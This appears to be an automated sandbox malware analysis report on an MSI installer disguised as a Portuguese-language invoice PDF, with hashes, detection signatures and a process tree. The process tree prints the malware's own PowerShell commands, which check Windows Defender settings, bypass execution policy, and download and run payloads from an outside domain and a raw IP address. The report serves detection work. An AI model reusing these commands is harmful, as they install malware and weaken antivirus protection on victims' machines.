Edit tour
Windows
Analysis Report
Fatura227Pendente576.pdf674.msi
Overview
General Information
| Sample name: | Fatura227Pendente576.pdf674.msi |
| Analysis ID: | 1579251 |
| MD5: | bf51cb1493b515a20316ea9efe033f43 |
| SHA1: | c3b69212ad045089cb75d6f8385dd16df2b17ef8 |
| SHA256: | a49b22353cf3d948186a5b790c37ac69f6cebe94308f4cc8b17ad87a4e8d21bd |
| Tags: | msiuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected MalDoc
Yara detected Powershell download and execute
AI detected suspicious URL
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates files in the system32 config directory
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
msiexec.exe (PID: 4548 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ Fatura227P endente576 .pdf674.ms i" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 796 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 1440 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng C85DA56 207AAF23DF EFCC42BBFF 0E5E4 MD5: 9D09DC1EDA745A5F87553048E57620CF) 
powershell.exe (PID: 1260 cmdline: -NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss14 3.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 3808 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7348 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss29 70.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chrome.exe (PID: 7468 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://yqvn-6 391824-met aflux-xytr mnwl-246.1 mp3.org/fa tura/fatur a.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7696 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2084 --fi eld-trial- handle=195 6,i,124672 8156763626 5380,10636 9973373951 96544,2621 44 /prefet ch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - powershell.exe (PID: 2000 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss3F BB.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 5024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6944 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss65 68.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2724 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss8A 88.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3396 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssA5 E4.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 8044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5024 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssD4 0C.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2656 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssB9 B.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5436 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss4E 65.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7812 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss9A D3.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2596 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss12 97.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7180 cmdline:
Powershell .exe -Wind owStyle Hi dden -Exec utionPolic y Bypass - File C:\te mp\ShowUpd ateScreen. ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
svchost.exe (PID: 7584 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 6028 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ loopComple ted = $fal se for ( $i = 0; $i -lt 3; $i ++) { Start-Slee p -Seconds 60 # Verifica a s chaves d o Registro $keyP ath = 'HKL M:\SOFTWAR E\Policies \Microsoft \Windows D efender' $disabl eAntiSpywa re = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiSpyw are' -Erro rAction Si lentlyCont inue).Disa bleAntiSpy ware $ disableAnt iVirus = ( Get-ItemPr operty -Pa th $keyPat h -Name 'D isableAnti Virus' -Er rorAction SilentlyCo ntinue).Di sableAntiV irus # Se uma da s chaves n o existir ou n o ti ver valor 1, sai do loop e def ine que o loop compl etou i f ($disabl eAntiSpywa re -ne 1 - or $disabl eAntiVirus -ne 1) { $loo pCompleted = $true break } } # Se o loop tiver sido inte rrompido, executa a tarefa age ndada ATD if ($loo pCompleted ) { St art-Schedu ledTask -T askName 'A TD' Wr ite-Output 'Tarefa a gendada AT D executad a com suce sso.' } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7316 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ folderPath = 'C:\Loc alNow' $ fileUrl = 'https://q sif-943275 1-neuralli nk-bwlprty x-099.comp utador-har dware.net/ simples/ro sa.png' $downloade dFile = Jo in-Path $f olderPath 'rosa.png' $zipFil e = Join-P ath $folde rPath 'ros a.zip' $ extractedF older = Jo in-Path $f olderPath 'Extracted ' whil e ($true) { Star t-Sleep -S econds 60 if (!(Test-P ath -Path $folderPat h)) { Write-Ou tput 'Past a LocalNow n o encon trada. Agu ardando no va verific a o.' continue } # Ver ifica se e xiste algu m arquivo DLL na pas ta $dl lFiles = G et-ChildIt em -Path $ folderPath -Filter * .dll -Recu rse -Error Action Sil entlyConti nue if ($dll Files -and $dllFiles .Count -gt 0) { Write-Ou tput 'Arqu ivo DLL en contrado: $($dllFile s[0].Name) ' br eak # Sai do loop wh ile } Wr ite-Output 'Arquivo DLL n o en contrado. Reiniciand o o proces so.' # Limpa a pasta a ntes de no vo downloa d try { Ge t-ChildIte m -Path $f olderPath -Recurse | Remove-It em -Force -Recurse - ErrorActio n Stop # Download e extra o Invo ke-WebRequ est -Uri $ fileUrl -O utFile $do wnloadedFi le -ErrorA ction Stop Ren ame-Item - Path $down loadedFile -NewName $zipFile - ErrorActio n Stop Expand- Archive -P ath $zipFi le -Destin ationPath $extracted Folder -Fo rce -Error Action Sto p Write- Output 'Pr ocesso de extra o co mpletado c om sucesso .' } catch { Wri te-Output 'Erro dura nte o proc esso: $($_ .Exception .Message)' Sta rt-Sleep - Seconds 30 # Espera antes de t entar nova mente } } exit # Enc erra o scr ipt ap s s air do loo p }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4336 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -WindowSty le Hidden -File "C:\ Users\user \AppData\L ocal\Temp\ Executar01 aa.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3812 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ folderPath = 'C:\Loc alNow' $ loopComple ted = $fal se for ( $i = 0; $i -lt 3; $i ++) { Start-Slee p -Seconds 60 # Verifica a s chaves d o Registro $keyP ath = 'HKL M:\SOFTWAR E\Policies \Microsoft \Windows D efender' $disabl eAntiSpywa re = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiSpyw are' -Erro rAction Si lentlyCont inue).Disa bleAntiSpy ware -eq 1 $disa bleAntiVir us = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiViru s' -ErrorA ction Sile ntlyContin ue).Disabl eAntiVirus -eq 1 # Se ambas as c haves exis tirem com valor 1, s ai do loop e define que o loop completou if ($ disableAnt iSpyware - eq 1 -and $disableAn tiVirus -e q 1) { $loopCo mpleted = $true break } } # Se o loo p tiver si do interro mpido, ver ifica se a pasta j e xiste e a cria se ne cess rio if ($loop Completed -and !(Tes t-Path -Pa th $folder Path)) { New-Ite m -ItemTyp e Director y -Path $f olderPath -Force Write-Out put "Pasta C:\LocalN ow criada com sucess o ap s o l oop comple tar." } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5168 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5516 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -Command " if (-not ( Test-Path 'C:\temp') ) { New- Item -Item Type Direc tory -Path 'C:\temp' -Force | Out-Null } try { I nvoke-WebR equest -Ur i 'http:// 192.124.21 6.14/vd/si s/DownSist em.ps1' -O utFile 'C: \temp\Down Sistem.ps1 ' -UseBasi cParsing Write-Out put 'Arqui vo DownSis tem.ps1 ba ixado com sucesso em C:\temp\D ownSistem. ps1' } cat ch { Wri te-Output 'Erro ao b aixar o ar quivo Down Sistem.ps1 : ' exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4948 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -File "C:\ temp\DownS istem.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6812 cmdline:
Powershell .exe -Wind owStyle Hi dden -Exec utionPolic y Bypass - File C:\te mp\ShowUpd ateScreen. ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 3716 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\2xgfsw ae.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 3336 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES7FB3.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 1F1FEE1B60 354EE49FE3 D23A31B124 4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 4464 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -File C:\t emp\sistem a.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 652 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ loopComple ted = $fal se for ( $i = 0; $i -lt 3; $i ++) { Start-Slee p -Seconds 60 # Verifica a s chaves d o Registro $keyP ath = 'HKL M:\SOFTWAR E\Policies \Microsoft \Windows D efender' $disabl eAntiSpywa re = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiSpyw are' -Erro rAction Si lentlyCont inue).Disa bleAntiSpy ware $ disableAnt iVirus = ( Get-ItemPr operty -Pa th $keyPat h -Name 'D isableAnti Virus' -Er rorAction SilentlyCo ntinue).Di sableAntiV irus # Se uma da s chaves n o existir ou n o ti ver valor 1, sai do loop e def ine que o loop compl etou i f ($disabl eAntiSpywa re -ne 1 - or $disabl eAntiVirus -ne 1) { $loo pCompleted = $true break } } # Se o loop tiver sido inte rrompido, executa a tarefa age ndada ATD if ($loo pCompleted ) { St art-Schedu ledTask -T askName 'A TD' Wr ite-Output 'Tarefa a gendada AT D executad a com suce sso.' } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||